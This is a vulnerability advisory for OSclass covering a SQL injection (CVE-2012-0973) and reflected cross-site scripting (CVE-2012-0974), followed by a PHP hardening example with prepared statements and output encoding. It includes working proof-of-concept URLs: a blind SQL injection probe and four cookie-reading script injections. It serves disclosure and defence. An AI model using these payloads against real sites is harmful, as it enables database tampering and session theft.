High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OSclass, which can be exploited to perform cross-site scripting and SQL injection attacks.
SQL Injection in OSclass: CVE-2012-0973.
Input passed via the “sCategory” GET parameter to /index.php is not properly sanitised before being used in an SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1%29%29=5%29%20d%20--%202
Successful exploitation of the vulnerability requires that “magic_quotes_gpc” is off.
Cross-Site Scripting in OSclass: CVE-2012-0974.
Input passed via the “sCity”, “sPattern”, “sPriceMax”, “sPriceMin” GET parameters to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user’s browser session in the context of the affected website.
The following PoC code is available:
http://[host]/index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
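The following is an added illustration of how a search handler can close both issues above (the array-valued “sCategory” reaching an SQL query, and the “sCity”/“sPattern”/“sPriceMax”/“sPriceMin” values reflected into HTML); it is not OSclass code, and the table and column names, the $pdo connection and the helper names are assumptions.

```php
<?php
// Hardening pattern for the two advisory items (added example, not OSclass code).
// Assumes an existing PDO connection in $pdo and a hypothetical "items" table.

// sCategory may arrive as a scalar or as an array (sCategory[]=...). A string
// filter applied only to scalars misses the array case, so normalise every
// element to a positive integer and discard anything else.
function normalizeCategoryIds($raw): array {
    $values = is_array($raw) ? $raw : [$raw];
    $ids = [];
    foreach ($values as $v) {
        if (is_scalar($v) && ctype_digit((string) $v)) {
            $ids[] = (int) $v;
        }
    }
    return array_values(array_unique($ids));
}

function findItemsByCategory(PDO $pdo, array $ids): array {
    if ($ids === []) {
        return [];
    }
    // One bound placeholder per id: the values never enter the SQL text, so the
    // query does not depend on magic_quotes_gpc or any escaping function.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare(
        "SELECT id, title FROM items WHERE category_id IN ($placeholders)"
    );
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Reflected parameters are encoded for the HTML context at output time.
// ENT_QUOTES neutralises the attribute break-out ("> ...), and encoding
// '<' and '>' stops a value from closing a <title> element.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Only accept strings for the text parameters; an array here is a tamper signal.
function getString(string $name): string {
    return is_string($_GET[$name] ?? null) ? $_GET[$name] : '';
}

$categoryIds = normalizeCategoryIds($_GET['sCategory'] ?? []);
$items       = findItemsByCategory($pdo, $categoryIds);

echo '<title>Search: ' . h(getString('sPattern')) . '</title>';
echo '<input type="text" name="sCity" value="' . h(getString('sCity')) . '">';
echo '<input type="text" name="sPriceMin" value="' . h(getString('sPriceMin')) . '">';
echo '<input type="text" name="sPriceMax" value="' . h(getString('sPriceMax')) . '">';
```

Prices should additionally be validated as numbers before they reach any query; the encoding above only addresses the reflection into HTML.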